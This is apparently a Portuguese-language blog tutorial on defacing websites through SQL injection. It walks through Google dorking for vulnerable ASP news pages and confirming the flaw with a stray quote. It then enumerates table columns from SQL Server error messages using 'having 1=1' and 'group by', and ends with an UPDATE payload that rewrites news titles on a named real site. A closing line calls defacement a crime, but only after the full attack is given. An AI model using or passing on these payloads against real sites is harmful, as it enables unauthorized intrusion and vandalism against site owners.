Olá galera. fiz esse pequeno tuto para demonstrar umas das milhares técnicas para se fazer um deface.
essa técnica da qual irei demonstrar é muito simples, de se executar.
Materias preciso:
1. Google
2. Pouco de Cérebro =D
Let's Hacking !
Primeiramente abra o www.google.com.br
depois no campo de busca digite: allinurl: noticias.asp?id=
ps: pra quem não sabe esse 'allinurl' serve para buscar na url dos sites 'noticias.asp?id='
escolha um dos sites que aparecer e entre.
por exemplo:
http://www.corretorimoveis.com.br/no...cod_noticia=65
quando o site abrir vc vai adicionar uma aspa simples no final da sua url, ficando assim:
http://www.corretorimoveis.com.br/noticias.asp?cod_noticia=65'
se retornar um erro parecido com este abaixo é pq o site em questão é vulnerável a SQL INJECTION:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/noticias.asp, line 152
o que fazer agora ?
vamos colocar uma string na url para retornar msgs de erro do qual iremos descobrir os campos da tabela.
http://www.corretorimoveis.com.br/no...cod_noticia=65 having 1=1
resultado:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Noticias.Cod_Noticia' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/noticias.asp, line 152
Bingooooooo. Descobrimos o primeiro campo do banco de dados do site, sabemos agora que a tabela se chama Noticias e o 1° campo da tabela é o Cod_noticia.
Para descobrirmos outros campos da tabela. Iremos trocar o comando having 1=1 por group by agora ficando
http://www.corretorimoveis.com.br/no...cod_noticia=65 group by Noticias.Cod_Noticia
Opa. Descobrimos outro campo
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Noticias.Tit_Noticia' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/noticias.asp, line 152
você pode ficar fazendo isto para pegar todos os campos da tabela, é so colocar a virgula entre os campos já encontrados. por exemplo:
http://www.corretorimoveis.com.br/no...cod_noticia=65 group by Noticias.Cod_Noticia, Noticias.Tit_Noticia
já encontramos o campo Tit_Noticia que faz referencia ao titula das noticias.
para alterar o titulo e concluir o ataque é so fazer o seguinte:
http://www.corretorimoveis.com.br/noticias.asp?cod_noticia=65+update+Noticias+set+Ti t_Noticia='you was Hacked'
só isso. Depois é so atualizar a pagina que já estará hackeado... Boa diversão galera.
So lembrando Deface é crime, não vai sair detonando por ai e depois dizer que foi o Victor Hugo que lhe ensinou!
Conhecimento não é crime, não saber usá-lo é burrice.
Assinar:
Postar comentários (Atom)
Postagens
Nenhum comentário:
Postar um comentário